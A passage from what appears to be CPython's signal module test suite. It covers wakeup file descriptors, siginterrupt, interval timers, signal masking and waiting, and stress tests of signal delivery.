def test_issue9324(self):
# Updated for issue #10003, adding SIGBREAK
handler = lambda x, y: None
checked = set()
for sig in (signal.SIGABRT, signal.SIGBREAK, signal.SIGFPE,
signal.SIGILL, signal.SIGINT, signal.SIGSEGV,
signal.SIGTERM):
# Set and then reset a handler for signals that work on windows.
# Issue #18396, only for signals without a C-level handler.
if signal.getsignal(sig) is not None:
signal.signal(sig, signal.signal(sig, handler))
checked.add(sig)
# Issue #18396: Ensure the above loop at least tested *something*
self.assertTrue(checked)
with self.assertRaises(ValueError):
signal.signal(-1, handler)
with self.assertRaises(ValueError):
signal.signal(7, handler)
@unittest.skipUnless(sys.executable, "sys.executable required.")
def test_keyboard_interrupt_exit_code(self):
"""KeyboardInterrupt triggers an exit using STATUS_CONTROL_C_EXIT."""
# We don't test via os.kill(os.getpid(), signal.CTRL_C_EVENT) here
# as that requires setting up a console control handler in a child
# in its own process group. Doable, but quite complicated. (see
# @eryksun on https://github.com/python/cpython/pull/11862)
process = subprocess.run(
[sys.executable, "-c", "raise KeyboardInterrupt"],
stderr=subprocess.PIPE)
self.assertIn(b"KeyboardInterrupt", process.stderr)
STATUS_CONTROL_C_EXIT = 0xC000013A
self.assertEqual(process.returncode, STATUS_CONTROL_C_EXIT)
class WakeupFDTests(unittest.TestCase):
def test_invalid_call(self):
# First parameter is positional-only
with self.assertRaises(TypeError):
signal.set_wakeup_fd(signum=signal.SIGINT)
# warn_on_full_buffer is a keyword-only parameter
with self.assertRaises(TypeError):
signal.set_wakeup_fd(signal.SIGINT, False)
def test_invalid_fd(self):
fd = os_helper.make_bad_fd()
self.assertRaises((ValueError, OSError),
signal.set_wakeup_fd, fd)
def test_invalid_socket(self):
sock = socket.socket()
fd = sock.fileno()
sock.close()
self.assertRaises((ValueError, OSError),
signal.set_wakeup_fd, fd)
def test_set_wakeup_fd_result(self):
r1, w1 = os.pipe()
self.addCleanup(os.close, r1)
self.addCleanup(os.close, w1)
r2, w2 = os.pipe()
self.addCleanup(os.close, r2)
self.addCleanup(os.close, w2)
if hasattr(os, 'set_blocking'):
os.set_blocking(w1, False)
os.set_blocking(w2, False)
signal.set_wakeup_fd(w1)
self.assertEqual(signal.set_wakeup_fd(w2), w1)
self.assertEqual(signal.set_wakeup_fd(-1), w2)
self.assertEqual(signal.set_wakeup_fd(-1), -1)
def test_set_wakeup_fd_socket_result(self):
sock1 = socket.socket()
self.addCleanup(sock1.close)
sock1.setblocking(False)
fd1 = sock1.fileno()
sock2 = socket.socket()
self.addCleanup(sock2.close)
sock2.setblocking(False)
fd2 = sock2.fileno()
signal.set_wakeup_fd(fd1)
self.assertEqual(signal.set_wakeup_fd(fd2), fd1)
self.assertEqual(signal.set_wakeup_fd(-1), fd2)
self.assertEqual(signal.set_wakeup_fd(-1), -1)
# On Windows, files are always blocking and Windows does not provide a
# function to test if a socket is in non-blocking mode.
@unittest.skipIf(sys.platform == "win32", "tests specific to POSIX")
def test_set_wakeup_fd_blocking(self):
rfd, wfd = os.pipe()
self.addCleanup(os.close, rfd)
self.addCleanup(os.close, wfd)
# fd must be non-blocking
os.set_blocking(wfd, True)
with self.assertRaises(ValueError) as cm:
signal.set_wakeup_fd(wfd)
self.assertEqual(str(cm.exception),
"the fd %s must be in non-blocking mode" % wfd)
# non-blocking is ok
os.set_blocking(wfd, False)
signal.set_wakeup_fd(wfd)
signal.set_wakeup_fd(-1)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class WakeupSignalTests(unittest.TestCase):
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def check_wakeup(self, test_body, *signals, ordered=True):
# use a subprocess to have only one thread
code = """if 1:
import _testcapi
import os
import signal
import struct
signals = {!r}
def handler(signum, frame):
pass
def check_signum(signals):
data = os.read(read, len(signals)+1)
raised = struct.unpack('%uB' % len(data), data)
if not {!r}:
raised = set(raised)
signals = set(signals)
if raised != signals:
raise Exception("%r != %r" % (raised, signals))
{}
signal.signal(signal.SIGALRM, handler)
read, write = os.pipe()
os.set_blocking(write, False)
signal.set_wakeup_fd(write)
test()
check_signum(signals)
os.close(read)
os.close(write)
""".format(tuple(map(int, signals)), ordered, test_body)
assert_python_ok('-c', code)
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_wakeup_write_error(self):
# Issue #16105: write() errors in the C signal handler should not
# pass silently.
# Use a subprocess to have only one thread.
code = """if 1:
import _testcapi
import errno
import os
import signal
import sys
from test.support import captured_stderr
def handler(signum, frame):
1/0
signal.signal(signal.SIGALRM, handler)
r, w = os.pipe()
os.set_blocking(r, False)
# Set wakeup_fd a read-only file descriptor to trigger the error
signal.set_wakeup_fd(r)
try:
with captured_stderr() as err:
signal.raise_signal(signal.SIGALRM)
except ZeroDivisionError:
# An ignored exception should have been printed out on stderr
err = err.getvalue()
if ('Exception ignored when trying to write to the signal wakeup fd'
not in err):
raise AssertionError(err)
if ('OSError: [Errno %d]' % errno.EBADF) not in err:
raise AssertionError(err)
else:
raise AssertionError("ZeroDivisionError not raised")
os.close(r)
os.close(w)
"""
r, w = os.pipe()
try:
os.write(r, b'x')
except OSError:
pass
else:
self.skipTest("OS doesn't report write() error on the read end of a pipe")
finally:
os.close(r)
os.close(w)
assert_python_ok('-c', code)
def test_wakeup_fd_early(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
class InterruptSelect(Exception):
pass
def handler(signum, frame):
raise InterruptSelect
signal.signal(signal.SIGALRM, handler)
signal.alarm(1)
# We attempt to get a signal during the sleep,
# before select is called
try:
select.select([], [], [], TIMEOUT_FULL)
except InterruptSelect:
pass
else:
raise Exception("select() was not interrupted")
before_time = time.monotonic()
select.select([read], [], [], TIMEOUT_FULL)
after_time = time.monotonic()
dt = after_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""", signal.SIGALRM)
def test_wakeup_fd_during(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
class InterruptSelect(Exception):
pass
def handler(signum, frame):
raise InterruptSelect
signal.signal(signal.SIGALRM, handler)
signal.alarm(1)
before_time = time.monotonic()
# We attempt to get a signal during the select call
try:
select.select([read], [], [], TIMEOUT_FULL)
except InterruptSelect:
pass
else:
raise Exception("select() was not interrupted")
after_time = time.monotonic()
dt = after_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""", signal.SIGALRM)
def test_signum(self):
self.check_wakeup("""def test():
signal.signal(signal.SIGUSR1, handler)
signal.raise_signal(signal.SIGUSR1)
signal.raise_signal(signal.SIGALRM)
""", signal.SIGUSR1, signal.SIGALRM)
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pending(self):
self.check_wakeup("""def test():
signum1 = signal.SIGUSR1
signum2 = signal.SIGUSR2
signal.signal(signum1, handler)
signal.signal(signum2, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, (signum1, signum2))
signal.raise_signal(signum1)
signal.raise_signal(signum2)
# Unblocking the 2 signals calls the C signal handler twice
signal.pthread_sigmask(signal.SIG_UNBLOCK, (signum1, signum2))
""", signal.SIGUSR1, signal.SIGUSR2, ordered=False)
@unittest.skipUnless(hasattr(socket, 'socketpair'), 'need socket.socketpair')
class WakeupSocketSignalTests(unittest.TestCase):
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_socket(self):
# use a subprocess to have only one thread
code = """if 1:
import signal
import socket
import struct
import _testcapi
signum = signal.SIGINT
signals = (signum,)
def handler(signum, frame):
pass
signal.signal(signum, handler)
read, write = socket.socketpair()
write.setblocking(False)
signal.set_wakeup_fd(write.fileno())
signal.raise_signal(signum)
data = read.recv(1)
if not data:
raise Exception("no signum written")
raised = struct.unpack('B', data)
if raised != signals:
raise Exception("%r != %r" % (raised, signals))
read.close()
write.close()
"""
assert_python_ok('-c', code)
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_send_error(self):
# Use a subprocess to have only one thread.
if os.name == 'nt':
action = 'send'
else:
action = 'write'
code = """if 1:
import errno
import signal
import socket
import sys
import time
import _testcapi
from test.support import captured_stderr
signum = signal.SIGINT
def handler(signum, frame):
pass
signal.signal(signum, handler)
read, write = socket.socketpair()
read.setblocking(False)
write.setblocking(False)
signal.set_wakeup_fd(write.fileno())
# Close sockets: send() will fail
read.close()
write.close()
with captured_stderr() as err:
signal.raise_signal(signum)
err = err.getvalue()
if ('Exception ignored when trying to {action} to the signal wakeup fd'
not in err):
raise AssertionError(err)
""".format(action=action)
assert_python_ok('-c', code)
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_warn_on_full_buffer(self):
# Use a subprocess to have only one thread.
if os.name == 'nt':
action = 'send'
else:
action = 'write'
code = """if 1:
import errno
import signal
import socket
import sys
import time
import _testcapi
from test.support import captured_stderr
signum = signal.SIGINT
# This handler will be called, but we intentionally won't read from
# the wakeup fd.
def handler(signum, frame):
pass
signal.signal(signum, handler)
read, write = socket.socketpair()
# Fill the socketpair buffer
if sys.platform == 'win32':
# bpo-34130: On Windows, sometimes non-blocking send fails to fill
# the full socketpair buffer, so use a timeout of 50 ms instead.
write.settimeout(0.050)
else:
write.setblocking(False)
written = 0
if sys.platform == "vxworks":
CHUNK_SIZES = (1,)
else:
# Start with large chunk size to reduce the
# number of send needed to fill the buffer.
CHUNK_SIZES = (2 ** 16, 2 ** 8, 1)
for chunk_size in CHUNK_SIZES:
chunk = b"x" * chunk_size
try:
while True:
write.send(chunk)
written += chunk_size
except (BlockingIOError, TimeoutError):
pass
print(f"%s bytes written into the socketpair" % written, flush=True)
write.setblocking(False)
try:
write.send(b"x")
except BlockingIOError:
# The socketpair buffer seems full
pass
else:
raise AssertionError("%s bytes failed to fill the socketpair "
"buffer" % written)
# By default, we get a warning when a signal arrives
msg = ('Exception ignored when trying to {action} '
'to the signal wakeup fd')
signal.set_wakeup_fd(write.fileno())
with captured_stderr() as err:
signal.raise_signal(signum)
err = err.getvalue()
if msg not in err:
raise AssertionError("first set_wakeup_fd() test failed, "
"stderr: %r" % err)
# And also if warn_on_full_buffer=True
signal.set_wakeup_fd(write.fileno(), warn_on_full_buffer=True)
with captured_stderr() as err:
signal.raise_signal(signum)
err = err.getvalue()
if msg not in err:
raise AssertionError("set_wakeup_fd(warn_on_full_buffer=True) "
"test failed, stderr: %r" % err)
# But not if warn_on_full_buffer=False
signal.set_wakeup_fd(write.fileno(), warn_on_full_buffer=False)
with captured_stderr() as err:
signal.raise_signal(signum)
err = err.getvalue()
if err != "":
raise AssertionError("set_wakeup_fd(warn_on_full_buffer=False) "
"test failed, stderr: %r" % err)
# And then check the default again, to make sure warn_on_full_buffer
# settings don't leak across calls.
signal.set_wakeup_fd(write.fileno())
with captured_stderr() as err:
signal.raise_signal(signum)
err = err.getvalue()
if msg not in err:
raise AssertionError("second set_wakeup_fd() test failed, "
"stderr: %r" % err)
""".format(action=action)
assert_python_ok('-c', code)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
@unittest.skipUnless(hasattr(signal, 'siginterrupt'), "needs signal.siginterrupt()")
class SiginterruptTest(unittest.TestCase):
def readpipe_interrupted(self, interrupt):
"""Perform a read during which a signal will arrive. Return True if the
read is interrupted by the signal and raises an exception. Return False
if it returns normally.
"""
# use a subprocess to have only one thread, to have a timeout on the
# blocking read and to not touch signal handling in this process
code = """if 1:
import errno
import os
import signal
import sys
interrupt = %r
r, w = os.pipe()
def handler(signum, frame):
1 / 0
signal.signal(signal.SIGALRM, handler)
if interrupt is not None:
signal.siginterrupt(signal.SIGALRM, interrupt)
print("ready")
sys.stdout.flush()
# run the test twice
try:
for loop in range(2):
# send a SIGALRM in a second (during the read)
signal.alarm(1)
try:
# blocking call: read from a pipe without data
os.read(r, 1)
except ZeroDivisionError:
pass
else:
sys.exit(2)
sys.exit(3)
finally:
os.close(r)
os.close(w)
""" % (interrupt,)
with spawn_python('-c', code) as process:
try:
# wait until the child process is loaded and has started
first_line = process.stdout.readline()
stdout, stderr = process.communicate(timeout=support.SHORT_TIMEOUT)
except subprocess.TimeoutExpired:
process.kill()
return False
else:
stdout = first_line + stdout
exitcode = process.wait()
if exitcode not in (2, 3):
raise Exception("Child error (exit code %s): %r"
% (exitcode, stdout))
return (exitcode == 3)
def test_without_siginterrupt(self):
# If a signal handler is installed and siginterrupt is not called
# at all, when that signal arrives, it interrupts a syscall that's in
# progress.
interrupted = self.readpipe_interrupted(None)
self.assertTrue(interrupted)
def test_siginterrupt_on(self):
# If a signal handler is installed and siginterrupt is called with
# a true value for the second argument, when that signal arrives, it
# interrupts a syscall that's in progress.
interrupted = self.readpipe_interrupted(True)
self.assertTrue(interrupted)
def test_siginterrupt_off(self):
# If a signal handler is installed and siginterrupt is called with
# a false value for the second argument, when that signal arrives, it
# does not interrupt a syscall that's in progress.
interrupted = self.readpipe_interrupted(False)
self.assertFalse(interrupted)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
@unittest.skipUnless(hasattr(signal, 'getitimer') and hasattr(signal, 'setitimer'),
"needs signal.getitimer() and signal.setitimer()")
class ItimerTest(unittest.TestCase):
def setUp(self):
self.hndl_called = False
self.hndl_count = 0
self.itimer = None
self.old_alarm = signal.signal(signal.SIGALRM, self.sig_alrm)
def tearDown(self):
signal.signal(signal.SIGALRM, self.old_alarm)
if self.itimer is not None: # test_itimer_exc doesn't change this attr
# just ensure that itimer is stopped
signal.setitimer(self.itimer, 0)
def sig_alrm(self, *args):
self.hndl_called = True
def sig_vtalrm(self, *args):
self.hndl_called = True
if self.hndl_count > 3:
# it shouldn't be here, because it should have been disabled.
raise signal.ItimerError("setitimer didn't disable ITIMER_VIRTUAL "
"timer.")
elif self.hndl_count == 3:
# disable ITIMER_VIRTUAL, this function shouldn't be called anymore
signal.setitimer(signal.ITIMER_VIRTUAL, 0)
self.hndl_count += 1
def sig_prof(self, *args):
self.hndl_called = True
signal.setitimer(signal.ITIMER_PROF, 0)
def test_itimer_exc(self):
# XXX I'm assuming -1 is an invalid itimer, but maybe some platform
# defines it ?
self.assertRaises(signal.ItimerError, signal.setitimer, -1, 0)
# Negative times are treated as zero on some platforms.
if 0:
self.assertRaises(signal.ItimerError,
signal.setitimer, signal.ITIMER_REAL, -1)
def test_itimer_real(self):
self.itimer = signal.ITIMER_REAL
signal.setitimer(self.itimer, 1.0)
signal.pause()
self.assertEqual(self.hndl_called, True)
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform in ('netbsd5',),
'itimer not reliable (does not mix well with threading) on some BSDs.')
def test_itimer_virtual(self):
self.itimer = signal.ITIMER_VIRTUAL
signal.signal(signal.SIGVTALRM, self.sig_vtalrm)
signal.setitimer(self.itimer, 0.3, 0.2)
start_time = time.monotonic()
while time.monotonic() - start_time < 60.0:
# use up some virtual time by doing real work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_vtalrm handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# virtual itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
def test_itimer_prof(self):
self.itimer = signal.ITIMER_PROF
signal.signal(signal.SIGPROF, self.sig_prof)
signal.setitimer(self.itimer, 0.2, 0.2)
start_time = time.monotonic()
while time.monotonic() - start_time < 60.0:
# do some work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_prof handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# profiling itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
def test_setitimer_tiny(self):
# bpo-30807: C setitimer() takes a microsecond-resolution interval.
# Check that float -> timeval conversion doesn't round
# the interval down to zero, which would disable the timer.
self.itimer = signal.ITIMER_REAL
signal.setitimer(self.itimer, 1e-6)
time.sleep(1)
self.assertEqual(self.hndl_called, True)
class PendingSignalsTests(unittest.TestCase):
"""
Test pthread_sigmask(), pthread_kill(), sigpending() and sigwait()
functions.
"""
@unittest.skipUnless(hasattr(signal, 'sigpending'),
'need signal.sigpending()')
def test_sigpending_empty(self):
self.assertEqual(signal.sigpending(), set())
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
@unittest.skipUnless(hasattr(signal, 'sigpending'),
'need signal.sigpending()')
def test_sigpending(self):
code = """if 1:
import os
import signal
def handler(signum, frame):
1/0
signum = signal.SIGUSR1
signal.signal(signum, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
os.kill(os.getpid(), signum)
pending = signal.sigpending()
for sig in pending:
assert isinstance(sig, signal.Signals), repr(pending)
if pending != {signum}:
raise Exception('%s != {%s}' % (pending, signum))
try:
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_kill'),
'need signal.pthread_kill()')
def test_pthread_kill(self):
code = """if 1:
import signal
import threading
import sys
signum = signal.SIGUSR1
def handler(signum, frame):
1/0
signal.signal(signum, handler)
tid = threading.get_ident()
try:
signal.pthread_kill(tid, signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def wait_helper(self, blocked, test):
"""
test: body of the "def test(signum):" function.
blocked: number of the blocked signal
"""
code = '''if 1:
import signal
import sys
from signal import Signals
def handler(signum, frame):
1/0
%s
blocked = %r
signum = signal.SIGALRM
# child: block and wait the signal
try:
signal.signal(signum, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, [blocked])
# Do the tests
test(signum)
# The handler must not be called on unblock
try:
signal.pthread_sigmask(signal.SIG_UNBLOCK, [blocked])
except ZeroDivisionError:
print("the signal handler has been called",
file=sys.stderr)
sys.exit(1)
except BaseException as err:
print("error: {}".format(err), file=sys.stderr)
sys.stderr.flush()
sys.exit(1)
''' % (test.strip(), blocked)
# sig*wait* must be called with the signal blocked: since the current
# process might have several threads running, use a subprocess to have
# a single thread.
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'sigwait'),
'need signal.sigwait()')
def test_sigwait(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
received = signal.sigwait([signum])
assert isinstance(received, signal.Signals), received
if received != signum:
raise Exception('received %s, not %s' % (received, signum))
''')
@unittest.skipUnless(hasattr(signal, 'sigwaitinfo'),
'need signal.sigwaitinfo()')
def test_sigwaitinfo(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
info = signal.sigwaitinfo([signum])
if info.si_signo != signum:
raise Exception("info.si_signo != %s" % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
signal.alarm(1)
info = signal.sigtimedwait([signum], 10.1000)
if info.si_signo != signum:
raise Exception('info.si_signo != %s' % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_poll(self):
# check that polling with sigtimedwait works
self.wait_helper(signal.SIGALRM, '''
def test(signum):
import os
os.kill(os.getpid(), signum)
info = signal.sigtimedwait([signum], 0)
if info.si_signo != signum:
raise Exception('info.si_signo != %s' % signum)
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_timeout(self):
self.wait_helper(signal.SIGALRM, '''
def test(signum):
received = signal.sigtimedwait([signum], 1.0)
if received is not None:
raise Exception("received=%r" % (received,))
''')
@unittest.skipUnless(hasattr(signal, 'sigtimedwait'),
'need signal.sigtimedwait()')
def test_sigtimedwait_negative_timeout(self):
signum = signal.SIGALRM
self.assertRaises(ValueError, signal.sigtimedwait, [signum], -1.0)
@unittest.skipUnless(hasattr(signal, 'sigwait'),
'need signal.sigwait()')
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_sigwait_thread(self):
# Check that calling sigwait() from a thread doesn't suspend the whole
# process. A new interpreter is spawned to avoid problems when mixing
# threads and fork(): only async-safe functions are allowed between
# fork() and exec().
assert_python_ok("-c", """if True:
import os, threading, sys, time, signal
# the default handler terminates the process
signum = signal.SIGUSR1
def kill_later():
# wait until the main thread is waiting in sigwait()
time.sleep(1)
os.kill(os.getpid(), signum)
# the signal must be blocked by all the threads
signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
killer = threading.Thread(target=kill_later)
killer.start()
received = signal.sigwait([signum])
if received != signum:
print("sigwait() received %s, not %s" % (received, signum),
file=sys.stderr)
sys.exit(1)
killer.join()
# unblock the signal, which should have been cleared by sigwait()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
""")
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask_arguments(self):
self.assertRaises(TypeError, signal.pthread_sigmask)
self.assertRaises(TypeError, signal.pthread_sigmask, 1)
self.assertRaises(TypeError, signal.pthread_sigmask, 1, 2, 3)
self.assertRaises(OSError, signal.pthread_sigmask, 1700, [])
with self.assertRaises(ValueError):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.NSIG])
with self.assertRaises(ValueError):
signal.pthread_sigmask(signal.SIG_BLOCK, [0])
with self.assertRaises(ValueError):
signal.pthread_sigmask(signal.SIG_BLOCK, [1<<1000])
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask_valid_signals(self):
s = signal.pthread_sigmask(signal.SIG_BLOCK, signal.valid_signals())
self.addCleanup(signal.pthread_sigmask, signal.SIG_SETMASK, s)
# Get current blocked set
s = signal.pthread_sigmask(signal.SIG_UNBLOCK, signal.valid_signals())
self.assertLessEqual(s, signal.valid_signals())
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pthread_sigmask(self):
code = """if 1:
import signal
import os; import threading
def handler(signum, frame):
1/0
def kill(signum):
os.kill(os.getpid(), signum)
def check_mask(mask):
for sig in mask:
assert isinstance(sig, signal.Signals), repr(sig)
def read_sigmask():
sigmask = signal.pthread_sigmask(signal.SIG_BLOCK, [])
check_mask(sigmask)
return sigmask
signum = signal.SIGUSR1
# Install our signal handler
old_handler = signal.signal(signum, handler)
# Unblock SIGUSR1 (and copy the old mask) to test our signal handler
old_mask = signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
check_mask(old_mask)
try:
kill(signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
# Block and then raise SIGUSR1. The signal is blocked: the signal
# handler is not called, and the signal is now pending
mask = signal.pthread_sigmask(signal.SIG_BLOCK, [signum])
check_mask(mask)
kill(signum)
# Check the new mask
blocked = read_sigmask()
check_mask(blocked)
if signum not in blocked:
raise Exception("%s not in %s" % (signum, blocked))
if old_mask ^ blocked != {signum}:
raise Exception("%s ^ %s != {%s}" % (old_mask, blocked, signum))
# Unblock SIGUSR1
try:
# unblock the pending signal calls immediately the signal handler
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signum])
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
try:
kill(signum)
except ZeroDivisionError:
pass
else:
raise Exception("ZeroDivisionError not raised")
# Check the new mask
unblocked = read_sigmask()
if signum in unblocked:
raise Exception("%s in %s" % (signum, unblocked))
if blocked ^ unblocked != {signum}:
raise Exception("%s ^ %s != {%s}" % (blocked, unblocked, signum))
if old_mask != unblocked:
raise Exception("%s != %s" % (old_mask, unblocked))
"""
assert_python_ok('-c', code)
@unittest.skipUnless(hasattr(signal, 'pthread_kill'),
'need signal.pthread_kill()')
def test_pthread_kill_main_thread(self):
# Test that a signal can be sent to the main thread with pthread_kill()
# before any other thread has been created (see issue #12392).
code = """if True:
import threading
import signal
import sys
def handler(signum, frame):
sys.exit(3)
signal.signal(signal.SIGUSR1, handler)
signal.pthread_kill(threading.get_ident(), signal.SIGUSR1)
sys.exit(2)
"""
with spawn_python('-c', code) as process:
stdout, stderr = process.communicate()
exitcode = process.wait()
if exitcode != 3:
raise Exception("Child error (exit code %s): %s" %
(exitcode, stdout))
class StressTest(unittest.TestCase):
"""
Stress signal delivery, especially when a signal arrives in
the middle of recomputing the signal state or executing
previously tripped signal handlers.
"""
def setsig(self, signum, handler):
old_handler = signal.signal(signum, handler)
self.addCleanup(signal.signal, signum, old_handler)
def measure_itimer_resolution(self):
N = 20
times = []
def handler(signum=None, frame=None):
if len(times) < N:
times.append(time.perf_counter())
# 1 µs is the smallest possible timer interval,
# we want to measure what the concrete duration
# will be on this platform
signal.setitimer(signal.ITIMER_REAL, 1e-6)
self.addCleanup(signal.setitimer, signal.ITIMER_REAL, 0)
self.setsig(signal.SIGALRM, handler)
handler()
while len(times) < N:
time.sleep(1e-3)
durations = [times[i+1] - times[i] for i in range(len(times) - 1)]
med = statistics.median(durations)
if support.verbose:
print("detected median itimer() resolution: %.6f s." % (med,))
return med
def decide_itimer_count(self):
# Some systems have poor setitimer() resolution (for example
# measured around 20 ms. on FreeBSD 9), so decide on a reasonable
# number of sequential timers based on that.
reso = self.measure_itimer_resolution()
if reso <= 1e-4:
return 10000
elif reso <= 1e-2:
return 100
else:
self.skipTest("detected itimer resolution (%.3f s.) too high "
"(> 10 ms.) on this platform (or system too busy)"
% (reso,))
@unittest.skipUnless(hasattr(signal, "setitimer"),
"test needs setitimer()")
def test_stress_delivery_dependent(self):
"""
This test uses dependent signal handlers.
"""
N = self.decide_itimer_count()
sigs = []
def first_handler(signum, frame):
# 1e-6 is the minimum non-zero value for `setitimer()`.
# Choose a random delay so as to improve chances of
# triggering a race condition. Ideally the signal is received
# when inside critical signal-handling routines such as
# Py_MakePendingCalls().
signal.setitimer(signal.ITIMER_REAL, 1e-6 + random.random() * 1e-5)
def second_handler(signum=None, frame=None):
sigs.append(signum)
# Here on Linux, SIGPROF > SIGALRM > SIGUSR1. By using both
# ascending and descending sequences (SIGUSR1 then SIGALRM,
# SIGPROF then SIGALRM), we maximize chances of hitting a bug.
self.setsig(signal.SIGPROF, first_handler)
self.setsig(signal.SIGUSR1, first_handler)
self.setsig(signal.SIGALRM, second_handler) # for ITIMER_REAL
expected_sigs = 0
deadline = time.monotonic() + support.SHORT_TIMEOUT
while expected_sigs < N:
os.kill(os.getpid(), signal.SIGPROF)
expected_sigs += 1
# Wait for handlers to run to avoid signal coalescing
while len(sigs) < expected_sigs and time.monotonic() < deadline:
time.sleep(1e-5)
os.kill(os.getpid(), signal.SIGUSR1)
expected_sigs += 1
while len(sigs) < expected_sigs and time.monotonic() < deadline:
time.sleep(1e-5)
# All ITIMER_REAL signals should have been delivered to the
# Python handler
self.assertEqual(len(sigs), N, "Some signals were lost")
@unittest.skipUnless(hasattr(signal, "setitimer"),
"test needs setitimer()")
def test_stress_delivery_simultaneous(self):
"""
This test uses simultaneous signal handlers.
"""
N = self.decide_itimer_count()
sigs = []
def handler(signum, frame):
sigs.append(signum)
self.setsig(signal.SIGUSR1, handler)
self.setsig(signal.SIGALRM, handler) # for ITIMER_REAL
expected_sigs = 0
deadline = time.monotonic() + support.SHORT_TIMEOUT
while expected_sigs < N:
# Hopefully the SIGALRM will be received somewhere during
# initial processing of SIGUSR1.
signal.setitimer(signal.ITIMER_REAL, 1e-6 + random.random() * 1e-5)
os.kill(os.getpid(), signal.SIGUSR1)
expected_sigs += 2
# Wait for handlers to run to avoid signal coalescing
while len(sigs) < expected_sigs and time.monotonic() < deadline:
time.sleep(1e-5)
# All ITIMER_REAL signals should have been delivered to the
# Python handler
self.assertEqual(len(sigs), N, "Some signals were lost")
@unittest.skipUnless(hasattr(signal, "SIGUSR1"),
"test needs SIGUSR1")
def test_stress_modifying_handlers(self):
# bpo-43406: race condition between trip_signal() and signal.signal
signum = signal.SIGUSR1
num_sent_signals = 0
num_received_signals = 0
do_stop = False
def custom_handler(signum, frame):
nonlocal num_received_signals
num_received_signals += 1
def set_interrupts():
nonlocal num_sent_signals
while not do_stop:
signal.raise_signal(signum)
num_sent_signals += 1
def cycle_handlers():
while num_sent_signals < 100:
for i in range(20000):
# Cycle between a Python-defined and a non-Python handler
for handler in [custom_handler, signal.SIG_IGN]:
signal.signal(signum, handler)
old_handler = signal.signal(signum, custom_handler)
self.addCleanup(signal.signal, signum, old_handler)
t = threading.Thread(target=set_interrupts)
try:
ignored = False
with support.catch_unraisable_exception() as cm:
t.start()
cycle_handlers()
do_stop = True
t.join()
if cm.unraisable is not None:
# An unraisable exception may be printed out when
# a signal is ignored due to the aforementioned
# race condition, check it.
self.assertIsInstance(cm.unraisable.exc_value, OSError)
self.assertIn(
f"Signal {signum:d} ignored due to race condition",
str(cm.unraisable.exc_value))
ignored = True
# bpo-43406: Even if it is unlikely, it's technically possible that
# all signals were ignored because of race conditions.
if not ignored:
# Sanity check that some signals were received, but not all
self.assertGreater(num_received_signals, 0)
self.assertLess(num_received_signals, num_sent_signals)
finally:
do_stop = True
t.join()
class RaiseSignalTest(unittest.TestCase):
def test_sigint(self):
with self.assertRaises(KeyboardInterrupt):
signal.raise_signal(signal.SIGINT)
@unittest.skipIf(sys.platform != "win32", "Windows specific test")
